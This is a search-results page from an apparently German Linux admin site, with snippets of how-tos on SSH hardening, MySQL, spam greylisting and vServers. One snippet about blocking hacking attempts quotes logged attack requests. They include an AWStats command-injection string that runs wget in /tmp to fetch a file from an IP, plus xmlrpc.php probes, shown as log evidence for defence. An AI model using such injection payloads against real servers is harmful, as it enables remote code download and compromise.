Linux-Distributionen
Huschi als Linux-Admin
Volltextsuche
170 Suchergebnisse
Seite 4 von 12 Seiten
- Security & Firewalls:
Hacking-Versuche unterbindenProblem: Es wird ständig versucht den Server zu hacken. Z.B. über's Web (es wird aber jeweils ein 404 ausgelöst): "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%[...] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%[...] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2 "POST /xmlrpc.php HTTP/1.1" "POST /blog/xmlrpc.php HTTP/1.1" "POST - Linux (allgemein):
Linux: Speicher voll!Problem: Alle Anzeigen wie z.B. top, memfree, ps, etc. sagen mir, daß mein Speicher fast zu 100% voll ist. Aber ich hab doch kaum Programme am - Security & Firewalls:
SSH-BruteForce-Attacken eindämmenProblem: In den Logfiles stehen ständig Misslungene Einbruchsversuche auf dem SSH-Port. Lösungen: a) SSH-Port verlegen: in sshd_config den Parameter Port oder ListenAddress setzen. b) Per PAM-Modul: pam_abl c) Per - huschi.net:
Ten little UNIX linesTen little UNIX lines, were going to the law the Grecian line was for the birds as everybody saw. Nine little UNIX lines, presented at the court, one was not found - Datenbank-Server:
MySQL für externen Zugriff konfigurierenProblem: Auf die MySQL-Datenbank soll nicht nur vom localhost per Script oder phpMyAdmin zugegriffen werden, sondern auch von extern. Z.B. weil man einen eigenen MySQL-Client nutzt, - Mail-Server » Qmail:
Plesk & Qmail: Spamprotection mit GreylistingWas macht greylist? Greylisting ist eine effektive Methode zur Spam-Protection. Es block jede Email beim ersten Versuch. Erst wenn diese Email ein zweites Mal eingeliefert werden - Linux (allgemein):
Ungenaue SystemzeitProblem: Die Systemzeit läuft deutlich zu schnell oder zu langsam, wärend die Hardware-Clock relativ exakt geht. Erklärung: Dieses Phenomen taucht bei vielen Prozessoren auf, die ihre Geschwindigkeit drosseln - Security & Firewalls » Kurz-Tips:
Root-Zugang per SSH unterbindenErklärung: Eine Brute-Force-Attacke braucht immer einen bekannten User. Der bekannteste (und auch begehrteste) User ist natürlich root. Daher entzieht man root sicherheitshalber den direkten SSH-Zugang, legt einen - Virtuelle Server:
HOWTO: Debian auf vServer installierenWie man einen SuSE-vServer (ja Virtuellen-Server!) in einen Debian-vServer verwandelt kann man im Server-Support-Forum nachlesen: Link Evtl. wird dieses Howto auch mal hier erscheinen. Aber erstmal muß - Linux (allgemein):
Midnight-Commander: Rahmen-Darstellung verbessernProblem: MC nutzt Zeichen oberhalb von #127 um die Rahmen schöner dar zustellen. Je nach eigenen Zeichensatz kann dies recht häßliche auswirkungen haben. Lösung: MC mit dem Parameter - Mail-Server » Qmail:
Plesk: Spamassassin und ClamAV per qsheff einbindenDas Orginal stammt aus dem Server-Support-Forum: V-Server Strato Spamassassin + ClamAV HowTo mit Qsheff (Ich veröffentliche es mit freundlicher Genemigung des Autors Dennis Hoofe.Verbessert mit Hilfe vom - Virtuelle Server:
vServer: Speicherauslastung reduzierenProblem: Bei manchen virtuellen Servern steht die Speicherauslastung im roten Bereich (privvmpages in /proc/user_beancounters) ohne daß viel Betrieb auf dem Server besteht. Lösung: Den meisten Speicher verbrauchen meist - Admin- / ISP-Software » Plesk:
Plesk: fehlende Befehle in der chrooted-shell nachinstallierenProblem: In der chrooted-shell der Kunden-Accounts (soweit freigeschaltet) fehlen leider viele wichtige Befehle wie z.B. wget, tar, gzip, mysql, u.v.a. Erklärung: Die Vorlage für die chrooted-shell liegt im - Security & Firewalls:
HowTo: Secure Shell (SSH) - Public Key AuthenticationSinn & Zweck Public Key Authentication dient dazu, sich per SSH auf einem anderen Rechner einzuloggen oder Dateien zu übertragen, ohne sich jedes Mal mit einem - Web-Server:
CGI vs. Apache-ModulFrage:Was ist der Unterschied zwischen Scripten, die als CGI oder als Apache-Modul laufen? Welche Methode hat welche Vor- und Nachteile?Erklärung: CGI ist eine definierte Schnittstelle (common